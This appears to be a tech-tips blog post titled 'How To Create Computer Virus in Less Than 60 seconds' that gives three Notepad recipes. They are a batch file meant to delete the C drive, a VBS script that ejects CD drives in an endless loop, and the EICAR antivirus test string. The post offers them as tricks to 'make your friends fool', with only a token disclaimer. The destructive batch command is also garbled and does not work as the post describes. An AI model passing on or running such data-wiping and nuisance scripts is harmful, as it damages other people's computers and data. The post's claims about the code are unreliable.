How To Create Computer Virus in Less Than 60 seconds

How To Create Computer Virus in Less Than 60 seconds
How To Create Computer Virus in Less Than 60 seconds
Learn How To Create Computer Virus in Less Than 60 seconds: Almost every computer or laptop user has faced virus attack at least once in their life for sure, and we all know what is virus. Today we are going to describe three ways to create a virus in less than a minute. Go through the post to know about it.
Today we are here with the method to Create a Virus in Less Than 60 seconds. Today in every second a person is using a computer and almost every one of them knows about a virus. The virus is a malicious program that enters into the computer without your permission and can affect your data and operating system. Well, viruses are of different types as there are trojan horses and much more. However, have you ever thought about creating a virus? You can create one within seconds and it is possible with some simple methods that I am going to discuss in this post.

How To Create Computer Virus in Less Than 60 seconds

Many of you will think the methods must be on coding, but there is nothing like that. The tricks are based on the notepad. Just follow up the below steps for creating a virus within a minute.

1. Creating a Dangerous Virus

Step 1. First of all in your windows OS open the notepad.
Creating a Dangerous Virus
Creating a Dangerous Virus
Step 2. Now copy and paste the below code in your notepad screen.
@Echo off
Del C: *.* |y
Creating a Dangerous Virus
Creating a Dangerous Virus
Step 3. Now save this file as virus.bat (you can select any of random name but .bat after that must be there).
Creating a Dangerous Virus
Creating a Dangerous Virus
Now running the file will delete the C drive completely and the operating system of the respective computer will get corrupted.
Note: This method is only for knowledge purpose. Don’t try this in your computer as it will completely format your C drive.

2. Creating a Harmless Cdrom Virus

Open Notepad and Paste the following code in it and save it as CD-ROM.vbs or anything *.vbs
Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Creating a Harmless Cdrom Virus
Creating a Harmless Cdrom Virus
When you double click on this file you will be really amazed at what this simple harmless virus can do. Your CD/DVD drives will get continuously ejected.
To stop this virus you need to open Task manager and select process tab and end the wscript.exe file.

3. Create a Virus To Test Your Antivirus

Open notepad and paste the given code and simply save the file as “EICAR.COM”
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Create a Virus To Test Your Antivirus
Create a Virus To Test Your Antivirus
If you have an active antivirus then your antivirus program will simply remove this file in no-time. This is the harmless virus that is used to check the security level of your antivirus.

So this is all about How To Create a Virus in Less Than 60 seconds. By this method, you can easily create the harmful and harmless virus and can make your friends fool. If you have some more tricks like this you can  share with us. Hope you like the post! Don’t forget to share this cool post with your friends.

Comments

Popular posts from this blog

Honor 4C smartphone now available for Rs 8,099

@sgTechUpdates : 15 Famous Personalities And Their Amazing Business Cards

Google Introduces ‘Project Bloks’ to Encourage Kids to Code